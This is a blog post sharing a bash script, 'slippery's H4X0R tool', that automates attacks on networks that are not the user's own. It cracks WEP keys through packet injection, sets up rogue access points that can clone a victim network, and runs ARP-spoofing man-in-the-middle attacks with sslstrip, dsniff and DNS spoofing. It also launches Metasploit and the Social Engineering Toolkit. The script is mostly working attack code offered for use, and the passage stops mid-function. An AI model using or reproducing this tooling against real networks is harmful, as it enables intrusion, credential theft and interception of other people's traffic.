This is a work in progress....
NEED A HINT.... http://vimeo.com/13245482 Just the beginning...
Last update: 11-9-10. Check back for updates...
Currently you can:
1. Create a rogue AP and either sniff or attack it. NEW: after you crack WEP you can mirror the WEP-encrypted AP... endless possibilities... not tested, only theory at this point...
2. Sniff or attack your local subnet
3. Crack WEP (there are a lot of WEP attacks but I don't believe I have them all complete, so feel free to help with them, I have the basic layout done though) :)
4. Update some of the tools used in this script.
I notice the code formatting is kind of screwed up on here (the line breaks are lost). Not sure what to do about that.... If you know, comment :)
Comment on what you would like to see added to this, or any bugs you find.
If you need a tutorial on how to use this, please ask and I shall create!
TODO: a lot... haha...
#!/bin/bash clear echo "******************************************************************"; echo "* WeLcOmE tO sLiPpErY's H4X0R tOoL rEv 0.1 *"; echo "* TeStEd WiTh BackTrack 4 R1 aNd rOgUe Ap TeStEd WiTh rt73usb! *"; echo "* FeEl FrEe To EdIt ThIs FiLe As ToU wIsH! *"; echo "* SeNd QuEsTiOnS, cOmMeNtS oR aDdItIoNs To slippery@shellium.org *"; echo "******************************************************************"; echo # WEP Crack setup function wepcrack(){ clear; echo "******************************************************************"; echo "*********************Time to H4X0R some WEP!!*********************"; echo "******************************************************************"; echo "Checking if the correct programs are installed.........."; type -P aircrack-ng &>/dev/null || { echo "I require aircrack-ng but it's not installed. Abort.";} type -P xterm &>/dev/null || { echo "I require xterm but it's not installed. Abort.";} type -P macchanger &>/dev/null || { echo "I require macchanger to spoof your mac address but it's not installed.";} echo "******************************************************************"; echo "Killing old processes if they exist"; airmon-ng stop mon0 &>/dev/null; # Just incase you were already using monitor mode airmon-ng stop mon1 &>/dev/null; # If you happen to of had a 4th interface or airmon-ng stop mon2 &>/dev/null; # if your interface isn't mon0-3 please edit airmon-ng stop mon3 &>/dev/null; # this to what you have, ONLY EDIT HERE!! killall -q aircrack-ng airodump-ng aireplay-ng xterm &>/dev/null; # Should kill all programs that may interfere with this script echo "******************************************************************"; echo "Enter the interface used to H4X0R with (Ex. 
wlan0, wlan1)"; read WIFACE; echo "Using "$WIFACE" to H4X0R with"; ifconfig "$WIFACE" up; echo "******************************************************************"; airmon-ng start "$WIFACE" &>/dev/null; MIFACE=`ifconfig | grep UNSPEC | awk '{ print $1}' | cut -c 1-4`; # Finds your monitor interface from the selected interface - Note: If you see mutiple monitor interfaces then you need to edit above where it talks about killing monitor interfaces and insert the monitor interface you use. echo "Using "$MIFACE" as your monitor interface"; echo "******************************************************************"; xterm -hold -bg black -fg blue -T "Scanning networks" -geometry 90x20 -e airodump-ng "$MIFACE" -t wep &>/dev/null & # Scans for local WiFi networks echo "You should see a new window with local WEP networks"; echo "******************************************************************"; echo "Enter the name of an AP to H4X0R"; read ESSID; echo "******************************************************************"; echo "Enter the channel "$ESSID" is using"; read CHAN; echo "******************************************************************"; echo "Enter the MAC of "$ESSID""; read BSSID; echo "******************************************************************"; echo "If there is a client connected to "$ESSID" please type their MAC or just press enter"; read CLIENTMAC; echo "******************************************************************"; echo ""$ESSID"'s MAC is "$BSSID" and is using channel "$CHAN""; echo "******************************************************************"; echo "Enter the MAC you want to use for "$MIFACE" (Ex: 0A:1B:2C:3D:4E:5F)"; read MAC; echo "******************************************************************"; echo "Restarting "$WIFACE" and changing the MAC address to "$MAC" on "$MIFACE""; echo airmon-ng stop "$MIFACE" &>/dev/null; airmon-ng stop "$WIFACE" &>/dev/null; ifconfig "$WIFACE" down; ifconfig "$WIFACE" up; airmon-ng start "$WIFACE" 
"$CHAN" &>/dev/null; ifconfig "$MIFACE" down; sleep 2; macchanger -m "$MAC" "$MIFACE"; sleep 1; ifconfig "$MIFACE" up; modprobe tun; sleep 1; killall -q airodump-ng xterm &>/dev/null; sleep 1; echo "******************************************************************"; echo "Testing "$MIFACE" for injection"; xterm -hold -bg black -fg blue -T "Injection Test" -geometry 90x20 -e aireplay-ng -9 -e "$ESSID" -b "$BSSID" "$MIFACE" &>/dev/null & sleep 5; killall -q aireplay-ng xterm &>/dev/null; sleep 2; clear; wepattackmenu; } #Captures IV's and saves them to h4x0r.cap function capture(){ echo "******************************************************************"; rm h4x0r.cap-*; sleep 2; echo "Starting to capture IV's from "$ESSID""; xterm -hold -bg black -fg blue -T "Capturing IV's" -geometry 90x20 -e airodump-ng -c $CHAN --bssid "$BSSID" -w h4x0r.cap "$MIFACE" &>/dev/null & sleep 5; } function associate(){ echo "******************************************************************"; echo "Trying to associate with "$ESSID""; xterm -hold -bg black -fg blue -T "Associating" -geometry 90x20 -e aireplay-ng -1 0 -e "$ESSID" -a "$BSSID" -h "$MAC" "$MIFACE" &>/dev/null & #For Picky AP's uncomment below and comment the above... 
#xterm -hold -bg black -fg blue -T "Associating" -geometry 90x20 -e aireplay-ng -1 30 -q 10 -o 1 -e "$ESSID" -a "$BSSID" -h "$MAC" "$MIFACE" &>/dev/null & sleep 5; } function injectarpclientless(){ echo "******************************************************************"; echo "Injecting ARP packets into "$ESSID""; xterm -hold -bg black -fg blue -T "Injecting ARP packets" -geometry 90x20 -e aireplay-ng -3 -b "$BSSID" -h "$MAC" "$MIFACE" &>/dev/null & sleep 5; } function injectarpclient(){ echo "******************************************************************"; echo "Injecting Client ARP packets into "$ESSID""; #xterm -hold -bg black -fg blue -T "Injecting ARP packets" -geometry 90x20 -e aireplay-ng -2 -b "$BSSID" -d FF:FF:FF:FF:FF:FF -m 68 -n 86 -t 1 -f 1 "$MIFACE" &>/dev/null & xterm -hold -bg black -fg blue -T "Injecting ARP packets" -geometry 90x20 -e aireplay-ng -3 -b "$BSSID" -h "$CLIENTMAC" "$MIFACE" &>/dev/null & sleep 5; } function randomarpclientless(){ echo "******************************************************************"; echo "Injecting a random ARP packet into "$ESSID""; xterm -hold -bg black -fg blue -T "Reinjecting random ARP packet" -geometry 90x20 -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b "$BSSID" -h "$MAC" -r replay*.cap "$MIFACE" &>/dev/null & xterm -hold -bg black -fg blue -T "Reinjecting random ARP packet" -geometry 90x20 -e aireplay-ng -2 -p 0841 -m 68 -n 86 -b "$BSSID" -c FF:FF:FF:FF:FF:FF -h "$MAC" "$MIFACE" &>/dev/null & sleep 5; } function randomarpclient(){ echo "******************************************************************"; echo "Injecting a random ARP packet into "$ESSID""; xterm -hold -bg black -fg blue -T "Reinjecting random ARP packet" -geometry 90x20 -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b "$BSSID" -h "$CLIENTMAC" -r replay*.cap "$MIFACE" &>/dev/null & xterm -hold -bg black -fg blue -T "Reinjecting random ARP packet" -geometry 90x20 -e aireplay-ng -2 -p 0841 -m 68 -n 86 -b "$BSSID" -c FF:FF:FF:FF:FF:FF 
-h "$CLIENTMAC" "$MIFACE" &>/dev/null & sleep 5; } function fragclientless(){ echo "******************************************************************"; echo "Starting fragmenation attack against "$ESSID""; xterm -hold -bg black -fg blue -T "Fragmenation Attack" -geometry 90x20 -e aireplay-ng -5 -b "$BSSID" -h "$MAC" "$MIFACE" &>/dev/null & sleep 5; } function fragclient(){ echo "******************************************************************"; echo "Starting fragmenation attack against "$ESSID""; xterm -hold -bg black -fg blue -T "Fragmenation Attack" -geometry 90x20 -e aireplay-ng -5 -b "$BSSID" -h "$CLIENTMAC" "$MIFACE" &>/dev/null & sleep 5; } function chopchopclientless(){ echo "******************************************************************"; echo "Starting chop chop attack against "$ESSID""; xterm -hold -bg black -fg blue -T "Chop Chop Attack" -geometry 90x20 -e aireplay-ng -4 -b "$BSSID" -h "$MAC" "$MIFACE" &>/dev/null & sleep 5; } function chopchopclient(){ echo "******************************************************************"; echo "Starting chop chop attack against "$ESSID""; xterm -hold -bg black -fg blue -T "Chop Chop Attack" -geometry 90x20 -e aireplay-ng -4 -b "$BSSID" -h "$CLIENTMAC" "$MIFACE" &>/dev/null & sleep 5; } function injectcapturedarpcleintless(){ echo "******************************************************************"; echo "Injecting the created ARP packet"; xterm -hold -bg black -fg blue -T "Injecting ARP packets" -geometry 90x20 -e aireplay-ng -2 -b "$BSSID" -h "$MAC" -r h4x0r-arp "$MIFACE" &>/dev/null & sleep 5; } function injectcapturedarpcleint(){ echo "******************************************************************"; echo "Injecting the created ARP packet"; xterm -hold -bg black -fg blue -T "Injecting ARP packets" -geometry 90x20 -e aireplay-ng -2 -b "$BSSID" -h "$CLIENTMAC" -r h4x0r-arp "$MIFACE" &>/dev/null & sleep 5; } function xorfragclientless(){ packetforge-ng -0 -a "$BSSID" -h "$MAC" -k 255.255.255.255 -l 
255.255.255.255 -y fragment*.xor -w h4x0r-arp sleep 5; } function xorfragclient(){ packetforge-ng -0 -a "$BSSID" -h "$CLIENTMAC" -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w h4x0r-arp sleep 5; } function xorchopchopclientless(){ packetforge-ng -0 -a "$BSSID" -h "$MAC" -k 255.255.255.255 -l 255.255.255.255 -y replay*.xor -w h4x0r-arp sleep 5; } function xorchopchopclient(){ packetforge-ng -0 -a "$BSSID" -h "$CLIENTMAC" -k 255.255.255.255 -l 255.255.255.255 -y replay*.xor -w h4x0r-arp sleep 5; } #Cracks the key.... function crackkey(){ echo "******************************************************************"; read -p "Hit Enter when you have 10,000 IV's, could take up to 5 min."; echo "******************************************************************"; echo "Starting to H4X0R the WEP key.................."; xterm -hold -bg black -fg blue -T "Cracking" -e aircrack-ng -b "$BSSID" h4x0r*.cap &>/dev/null & sleep 1; echo "******************************************************************"; echo "You should see the WEP key soon......"; echo "******************************************************************"; exit 0 } #Defines the type of attack to crack WEP function wepattackmenu(){ clear; echo "******************************************************************"; echo "**************Please select the type of attack below**************"; echo "THIS WILL DELETE ANY PREVIOUS h4x0r.cap* FILE RENAME IT TO KEEP IT"; echo "******************************************************************"; showMenu () { echo echo "1) ARP request replay attack (clientless)" echo "2) NOT TESTED Fragmentation (clientless)" echo "3) NOT TESTED Chop Chop (clientless)" echo "3) NOT TESTED ARP request replay attack (client)" echo "4) NOT TESTED Fragmentation (Client)" echo "5) NOT TESTED Chop Chop (client)" } while [ 1 ] do showMenu read CHOICE case "$CHOICE" in "1") echo "ARP request replay attack (clientless)"; capture; associate; injectarpclientless; crackkey; ;; "2") echo 
"Fragmentation (clientless)"; capture; associate; fragclientless; xorfragclientless; injectcapturedarpcleintless; crackkey; ;; "3") echo "Chop Chop (clientless)" capture; associate; chopchopclientless; xorchopchopclientless; injectcapturedarpcleintless; crackkey; ;; "4") echo "ARP request replay attack (client)"; capture; associate; injectarpclientless; injectarpclient; crackkey; ;; "5") echo "Fragmentation (Client)"; capture; fragclient; xorfragclient; injectcapturedarpcleint; crackkey; ;; "6") echo "Chop Chop (client)"; capture; chopchopclient; xorchopchopclient; injectcapturedarpcleintless; crackkey; ;; esac done } # Script to gain information about your subnet and H4X0R it! function subnetscript(){ clear; echo "******************************************************************"; echo "Checking if the correct programs are installed.........."; type -P xterm &>/dev/null || { echo "I require xterm but it's not installed. Abort.";} type -P iptables &>/dev/null || { echo "I require iptables but it's not installed. 
Abort.";} type -P ettercap &>/dev/null || { echo "I require ettercap but it's not installed.";} type -P arpspoof &>/dev/null || { echo "I require arpspoof but it's not installed.";} type -P sslstrip &>/dev/null || { echo "I require sslstrip for a sniffing tool but it's not installed.";} type -P driftnet &>/dev/null || { echo "I require driftnet for a sniffing tool but it's not installed.";} type -P urlsnarf &>/dev/null || { echo "I require urlsnarf for a sniffing tool but it's not installed.";} type -P dsniff &>/dev/null || { echo "I require dsniff for a sniffing tool but it's not installed.";} type -P python &>/dev/null || { echo "I require python for certain tools but it's not installed.";} type -P macchanger &>/dev/null || { echo "I require macchanger to spoof your mac address but it's not installed.";} type -P msfconsole &>/dev/null || { echo "I require metasploit for an attack tool but it's not installed.";} locate set_config &>/dev/null || { echo "I require Social Engineering Toolkit for an attack tool but it's not installed.";} locate fast-track.py &>/dev/null || { echo "I require fast-track.py for an attack tool but it's not installed.";} locate SimpleHTTPServer &>/dev/null || { echo "I require SimpleHTTPServer for an attack tool but it's not installed.";} echo "******************************************************************"; echo "Activating IP Forwarding and killing old H4X0R processes if they exist"; echo "******************************************************************"; echo "Note: I'm not killing certian tools as you may have them open and waiting before you run this script"; killall -q ettercap arpspoof sslstrip driftnet urlsnarf dsniff xterm tail &>/dev/null & # Should kill all programs that may interfere with this script iptables --flush; # Makes sure your iptables are clear iptables --table nat --flush; # Makes sure your iptables are clear iptables --delete-chain; # Makes sure your iptables are clear iptables --table nat --delete-chain; # 
Makes sure your iptables are clear echo 1 > /proc/sys/net/ipv4/ip_forward; # Sets IP forwarding echo "******************************************************************"; IFACE=`ip route | awk '{print $3}' | sed q`; # Finds your interface echo "Using "$IFACE" as your internet connected interface"; echo "******************************************************************"; IFACEIP=`ip route | grep src | awk '{print $9}'`; # Finds your IP echo "Using "$IFACEIP" as your IP address for "$IFACE""; echo "******************************************************************"; GW=`ip route | grep via | awk '{print $3}'`; # Finds your Gateway IP echo "Using "$GW" for the Gateway address for "$IFACE""; echo "******************************************************************"; SUBNET=`ip route | awk '{print $1}' | sed q` # Finds your subnet echo "Using "$SUBNET" as as the subet to H4X0R"; echo "******************************************************************"; echo "Enter a MAC address to use, Ex: 0A:1B:2C:3D:4E:5F or hit enter to leave your MAC alone"; read MAC; echo "using "$MAC" for your MAC address"; echo "******************************************************************"; echo "Restarting and changing the MAC address to "$MAC" on "$IFACE""; ifconfig "$IFACE" down; sleep 2; macchanger -m "$MAC" "$IFACE"; ifconfig "$IFACE" up; modprobe tun; echo "******************************************************************"; arpsetup; qsubnet; } # Arpspoof Setup for subnet function arpsetup(){ clear; echo "******************************************************************"; echo "Do you want to arpspoof one client or all clients on the subnet of "$SUBNET"? 
(one or all) Note: webspy only works with one client!"; read SNIFFING; echo "******************************************************************"; if [ "$SNIFFING" == "all" ];then arpspoof -i "$IFACE" "$GW" &>/dev/null & elif [ "$SNIFFING" == "one" ];then xterm -hold -bg black -fg blue -T "netdiscover" -e netdiscover -i "$IFACE" -r "$SUBNET" &>/dev/null & echo "******************************************************************"; echo "Enter the victim's IP from the 'netdiscover' window"; read CLIENT; echo "arpspoofing "$CLIENT" only"; echo "******************************************************************"; arpspoof -i "$IFACE" -t "$GW" "$CLIENT" &>/dev/null & arpspoof -i "$IFACE" -t "$CLIENT" "$GW" &>/dev/null & else echo "******************************************************************"; echo "Enter 'one' or 'all' only!!!"; exit 0 fi iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080; } # DNS Spoof setup for subnet function dnsspoof(){ clear; iptables --table nat --flush; # clears the way for attacks... 
echo "******************************************************************"; echo "You can run this over and over if you need to change DNS spoofing"; echo "******************************************************************"; if cat /etc/etter.conf | grep -q '#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"'; then sed -i 's/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf; sed -i 's/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf; echo "Uncommented your iptables in /etc/etter.conf for you :)"; fi killall -q ettercap &>/dev/null & echo "Enter a website you want to dns spoof (Ex. 
'*.google.com' or '*' for all sites)"; read DNSADDY; echo "Every time a victim tries to connect to "$DNSADDY" they will be forwarded to "$IFACEIP""; echo "******************************************************************"; echo ""$DNSADDY" A "$IFACEIP"" > /usr/share/ettercap/etter.dns xterm -hold -bg black -fg blue -T "ettercap" -e sudo ettercap -T -q -p -l ettercap$(date +%F-%H%M).log -i "$IFACE" -P dns_spoof /"$CLIENT"/ /"$GW"/ &>/dev/null & #sudo ettercap -G &>/dev/null & sleep 5; } # Attack Menu for subnet function attacksn(){ clear; echo "******************************************************************"; echo "Launch DNS Spoof after your tools are setup!"; echo "******************************************************************"; showMenu () { echo echo "1) SimpleHTTPServer port 80" echo "2) Social Engineering Toolkit" echo "3) Metasploit" echo "4) Fast-Track" echo "5) Add your own tool" echo "6) Launch DNS Spoof" echo "7) Exit and cleanup" echo "8) Exit and leave everything running" echo } while [ 1 ] do showMenu read CHOICE case "$CHOICE" in "1") echo "Setting up SimpleHTTPServer on port 80 in "$PWD""; xterm -bg black -fg blue -T "SimpleHTTPServer" -e python -m SimpleHTTPServer 80 &>/dev/null & ;; "2") echo "Setting up Social Engineering Toolkit"; cd /pentest/exploits/SET && xterm -bg black -fg blue -T "Social Engineering Toolkit" -e ./set &>/dev/null & ;; "3") echo "Setting up Metasploit........."; cd /pentest/exploits/framework3 && xterm -bg black -fg blue -T "Metasploit" -e ./msfconsole &>/dev/null & sleep 2; echo "Few more seconds......"; ;; "4") echo "Setting up Fast-Track"; cd /pentest/exploits/fasttrack/ && xterm -bg black -fg blue -T "Fast-Track" -e ./fast-track.py -i &>/dev/null & ;; "5") echo "******************************************************************"; echo "What other attacks are you planning? 
Email me slippery@shellium.org"; xterm -bg black -fg blue &>/dev/null & echo "******************************************************************"; ;; "6") dnsspoof; ;; "7") echo "******************************************************************"; echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********"; echo "******************************************************************"; cleanup; exit 0 ;; "8") echo "******************************************************************"; echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********"; echo "******************************************************************"; firefox http://xslipperyh4x0r.blogspot.com/2010/10/slipperys-h4x0r-tool.html exit 0 ;; esac done } # Sniff menu for subnet function sniffsn(){ clear; echo "******************************************************************"; echo "Checking to see if your ready to run ettercap..."; echo "******************************************************************"; if cat /etc/etter.conf | grep -q '#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"'; then sed -i 's/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf; sed -i 's/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf; echo "Uncommented your iptables in /etc/etter.conf for you :)"; fi killall -q ettercap &>/dev/null & xterm -hold -bg black -fg blue -T "ettercap" -e sudo ettercap -T -q -p -l ettercap$(date +%F-%H%M).log -i "$IFACE" /"$CLIENT"/ /"$GW"/ &>/dev/null & #sudo ettercap -G &>/dev/null & sleep 7; clear; echo "If ettercap is now sniffing then startup 
some other fun tools"; echo "******************************************************************"; showMenu () { echo echo "1) sslstrip" echo "2) driftnet" echo "3) urlsnarf" echo "4) dsniff" echo "5) webspy (Only if you slected one client)" echo "6) Add your own tool" echo "7) Stop sniffing and start attacking" echo "8) Exit and cleanup" echo "9) Exit and leave everything running" echo } while [ 1 ] do showMenu read CHOICE case "$CHOICE" in "1") echo "Setting up sslstrip"; xterm -bg black -fg blue -T "sslstrip" -e sslstrip -a -k -f -l 8080 &>/dev/null & sleep 1; xterm -bg black -fg blue -T "sslstrip log" -e tail -f sslstrip.log &>/dev/null & ;; "2") echo "Setting up driftnet"; xterm -bg black -fg blue -T "driftnet" -e driftnet -v -i "$IFACE" &>/dev/null & ;; "3") echo "Setting up urlsnarf"; xterm -bg black -fg blue -T "urlsnarf" -e urlsnarf -i "$IFACE" &>/dev/null & ;; "4") echo "Setting up dsniff"; xterm -bg black -fg blue -T "dsniff" -e dsniff -m -i "$IFACE" -d -s 4096 -w dsniff$(date +%F-%H%M).log &>/dev/null & ;; "5") echo "Setting up webspy"; xterm -bg black -fg blue -T "webspy" -e webspy -i "$IFACE" "$CLIENT" &>/dev/null & sleep 2; mozilla & ;; "6") echo "******************************************************************"; echo "What other sniffing tools are you planning to use? 
Email me slippery@shellium.org"; xterm -bg black -fg blue &>/dev/null & echo "******************************************************************"; ;; "7") attackmenu; ;; "8") echo "******************************************************************"; echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********"; echo "******************************************************************"; cleanup; exit 0 ;; "9") echo "******************************************************************"; echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********"; echo "******************************************************************"; firefox http://xslipperyh4x0r.blogspot.com/2010/10/slipperys-h4x0r-tool.html exit 0 ;; esac done } # Defines if you want to sniff or attack the subnet function qsubnet(){ clear; echo "Do you want to sniff or attack the subnet of "$SUBNET"? (sniff or attack)"; read SN; if [ "$SN" == "sniff" ];then sniffsn; elif [ "$SN" == "attack" ];then attacksn; else echo "******************************************************************"; echo "Enter 'sniff' or 'attack' only!!!"; exit 0 fi } # Script to gain information to create a Rogue AP! function rogueapscript(){ clear; echo "******************************************************************"; echo "!!! Make sure the interface used to create the Rogue AP is connected before running this script, and that you are connected to the internet with a different interface !!!"; echo echo "Checking if the correct programs are installed.........."; type -P dhcpd3 &>/dev/null || { echo "I require dhcpd3 but it's not installed. Abort.";} type -P aircrack-ng &>/dev/null || { echo "I require aircrack-ng but it's not installed. Abort.";} type -P xterm &>/dev/null || { echo "I require xterm but it's not installed. Abort.";} type -P iptables &>/dev/null || { echo "I require iptables but it's not installed. 
Abort.";} type -P ettercap &>/dev/null || { echo "I require ettercap for sniffing but it's not installed.";} type -P sslstrip &>/dev/null || { echo "I require sslstrip for a sniffing tool but it's not installed.";} type -P driftnet &>/dev/null || { echo "I require driftnet for a sniffing tool but it's not installed.";} type -P urlsnarf &>/dev/null || { echo "I require urlsnarf for a sniffing tool but it's not installed.";} type -P dsniff &>/dev/null || { echo "I require dsniff for a sniffing tool but it's not installed.";} type -P python &>/dev/null || { echo "I require python for certain tools but it's not installed.";} type -P macchanger &>/dev/null || { echo "I require macchanger to spoof your mac address but it's not installed.";} type -P msfconsole &>/dev/null || { echo "I require metasploit for an attack tool but it's not installed.";} locate set_config &>/dev/null || { echo "I require Social Engineering Toolkit for an attack tool but it's not installed.";} locate fast-track.py &>/dev/null || { echo "I require fast-track.py for an attack tool but it's not installed.";} locate SimpleHTTPServer &>/dev/null || { echo "I require SimpleHTTPServer for an attack tool but it's not installed.";} echo "******************************************************************"; echo "Activating IP Forwarding and killing old Rogue AP processes if they exist"; echo "******************************************************************"; echo "Note: I'm not killing certian tools as you may have them open and waiting before you run this script"; airmon-ng stop mon0 &>/dev/null; # Just incase you were already using monitor mode airmon-ng stop mon1 &>/dev/null; # If you happen to of had a 4th interface or airmon-ng stop mon2 &>/dev/null; # if your interface isn't mon0-3 please edit airmon-ng stop mon3 &>/dev/null; # this to what you have, ONLY EDIT HERE!! 
killall -q dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf dsniff xterm tail &>/dev/null & # Should kill all programs that may interfere with this script iptables --flush; # Makes sure your iptables are clear iptables --table nat --flush; # Makes sure your iptables are clear iptables --delete-chain; # Makes sure your iptables are clear iptables --table nat --delete-chain; # Makes sure your iptables are clear echo 1 > /proc/sys/net/ipv4/ip_forward; # Sets IP forwarding echo "******************************************************************"; IFACE=`ip route | awk '{print $3}' | sed q`; # Finds your interface echo "Using "$IFACE" as your internet connected interface"; echo "******************************************************************"; IFACEIP=`ip route | grep src | awk '{print $9}'`; # Finds your IP echo "Using "$IFACEIP" as your IP address for "$IFACE""; echo "******************************************************************"; GW=`ip route | grep via | awk '{print $3}'`; # Finds your Gateway IP echo "Using "$GW" for the Gateway address for "$IFACE""; echo "******************************************************************"; echo "Enter the Interface used to create the Rogue AP (Ex. wlan0, wlan1)"; read WIFACE; echo "Using "$WIFACE" to create the Rouge AP"; ifconfig "$WIFACE" up; echo "******************************************************************"; airmon-ng start "$WIFACE" &>/dev/null; MIFACE=`ifconfig | grep UNSPEC | awk '{ print $1}' | cut -c 1-4`; # Finds your monitor interface from the selected Rogue AP interface - Note: If you see mutiple monitor interfaces then you need to edit above where it talks about killing monitor interfaces and insert the monitor interface you use. 
echo "Using "$MIFACE" as your monitor interface";
echo "******************************************************************";
iwlist "$WIFACE" scan | grep -E 'Address:|Channel:|ESSID:'; # Scans for local WiFi networks
echo
echo "^^^Above are some local WiFi networks^^^";
echo "******************************************************************";
echo "Enter the name of your Rogue AP";
read AP;
echo "Using "$AP" for Rogue AP name";
echo "******************************************************************";
echo "Enter the channel number for your Rogue AP (1,2,3,4,5,6,7,8,9)";
read CH;
echo "Using "$CH" for Rogue AP channel";
echo "******************************************************************";
echo "Enter the MAC for your Rogue AP (Ex: 0A:1B:2C:3D:4E:5F)";
read MAC;
echo "Using "$MAC" for Rogue AP MAC address";
echo "******************************************************************";
echo "Select your MTU setting (1400, 1500 or maybe 1800??)";
read MTU;
echo "Using "$MTU", If you have problems try a different setting";
echo "******************************************************************";
echo "Restarting "$WIFACE" and changing the MAC address to "$MAC" on "$MIFACE"";
airmon-ng stop "$MIFACE" &>/dev/null;
airmon-ng stop "$WIFACE" &>/dev/null;
ifconfig "$WIFACE" down;
ifconfig "$WIFACE" up;
airmon-ng start "$WIFACE" &>/dev/null;
ifconfig "$MIFACE" down;
sleep 2;
macchanger -m "$MAC" "$MIFACE";
ifconfig "$MIFACE" up;
modprobe tun;
echo "******************************************************************";
echo "Testing "$MIFACE" for injection";
xterm -hold -bg black -fg blue -T "Injection Test" -e aireplay-ng --test "$MIFACE" &>/dev/null &
sleep 7;
killall -q aireplay-ng;
echo "******************************************************************";
qrogueap;
}

#Sends you to the correct function if your copying someone's AP
# Globals read: AP.  Globals set: WEP, WEPKEY (the key is echoed back to the terminal in clear).
# NOTE(review): the invalid-input branch exits with status 0, so a wrapper cannot tell a
# refused prompt from a normal exit; every prompt in this file follows the same pattern.
function mirror(){
  echo "Are you mirroring "$AP", and do they have WEP encryption? (yes or no)";
  read WEP;
  if [ "$WEP" == "yes" ]; then
    echo "Enter their WEP key now";
    read WEPKEY;
    echo "Using "$WEPKEY" for "$AP"'s WEP key";
    weprogueap;
  elif [ "$WEP" == "no" ]; then
    rogueap;
  else
    echo "******************************************************************";
    echo "Enter 'yes' or 'no' only!!!";
    exit 0
  fi
}

#Creates the Rogue AP
# Globals read: AP, CH, MIFACE.  Globals set: CON.
# airbase-ng is launched inside a backgrounded xterm with all output discarded, so a failed
# start is never detected here; apsetup is called after a fixed 5 s sleep regardless.
function rogueap(){
  clear;
  echo "Do you want to let users connect, or help users to connect to "$AP"? (let or help)";
  read CON;
  if [ "$CON" == "let" ]; then
    echo "******************************************************************";
    echo "Building your "$AP" Rogue AP....";
    xterm -hold -bg black -fg blue -T "$AP" -e airbase-ng -e "$AP" -c "$CH" -v "$MIFACE" &>/dev/null &
    echo "******************************************************************";
    echo "Letting the clients connect to "$AP"";
  elif [ "$CON" == "help" ]; then
    echo "******************************************************************";
    echo "Building your "$AP" Rogue AP....";
    xterm -hold -bg black -fg blue -T "$AP" -e airbase-ng -P -C 30 -e "$AP" -c "$CH" -v "$MIFACE" &>/dev/null &
    echo "******************************************************************";
    echo "Helping clients to connect to "$AP"";
  else
    echo "******************************************************************";
    echo "Enter 'let' or 'help' only!!!";
    exit 0
  fi
  echo "******************************************************************";
  echo "Waiting a few seconds for "$AP" to be established";
  sleep 5;
  apsetup;
}

#Creates the Rogue AP with WEP encryption
# Identical to rogueap except that airbase-ng is also given -w "$WEPKEY" (set by mirror).
# Globals read: AP, CH, WEPKEY, MIFACE.  Globals set: CON.
function weprogueap(){
  clear;
  echo "Do you want to let users connect, or help users to connect to "$AP"? (let or help)";
  read CON;
  if [ "$CON" == "let" ]; then
    echo "******************************************************************";
    echo "Building your "$AP" Rogue AP....";
    xterm -hold -bg black -fg blue -T "$AP" -e airbase-ng -e "$AP" -c "$CH" -w "$WEPKEY" -v "$MIFACE" &>/dev/null &
    echo "******************************************************************";
    echo "Letting the clients connect to "$AP"";
  elif [ "$CON" == "help" ]; then
    echo "******************************************************************";
    echo "Building your "$AP" Rogue AP....";
    xterm -hold -bg black -fg blue -T "$AP" -e airbase-ng -P -C 30 -e "$AP" -c "$CH" -w "$WEPKEY" -v "$MIFACE" &>/dev/null &
    echo "******************************************************************";
    echo "Helping clients to connect to "$AP"";
  else
    echo "******************************************************************";
    echo "Enter 'let' or 'help' only!!!";
    exit 0
  fi
  echo "******************************************************************";
  echo "Waiting a few seconds for "$AP" to be established";
  sleep 5;
  apsetup;
}

# Sets up your Rogues AP's iptables and dhcp server
# Globals read: MTU, AP, IFACE, IFACEIP, GW, DO.  IFACE, IFACEIP and GW are set elsewhere in
# the script (not in this section); at0 is presumably the interface airbase-ng brings up — not
# shown here, confirm against airbase-ng.
# NOTE(review): /etc/dhcp3/dhcpd.conf is overwritten and /var/lib/dhcp3/dhcpd.leases truncated
# with no backup; cleanup() truncates both again, so any dhcpd configuration that existed on
# the host before the script ran is lost for good.
# NOTE(review): the DO check comes after the FORWARD policy, MASQUERADE and FORWARD rules
# have already been added, so an invalid DO exits leaving those changes in place.
function apsetup(){
  ifconfig at0 up;
  ifconfig at0 mtu "$MTU";
  ifconfig at0 10.0.0.1 netmask 255.255.255.0;
  route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1;
  echo "******************************************************************";
  echo ""$AP" should be running now!";
  echo "******************************************************************";
  echo "Setting up the iptables";
  iptables -P FORWARD ACCEPT;
  iptables --table nat --append POSTROUTING --out-interface "$IFACE" -j MASQUERADE;
  iptables --append FORWARD --in-interface at0 -j ACCEPT;
  if [ "$DO" == "sniff" ]; then
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080;
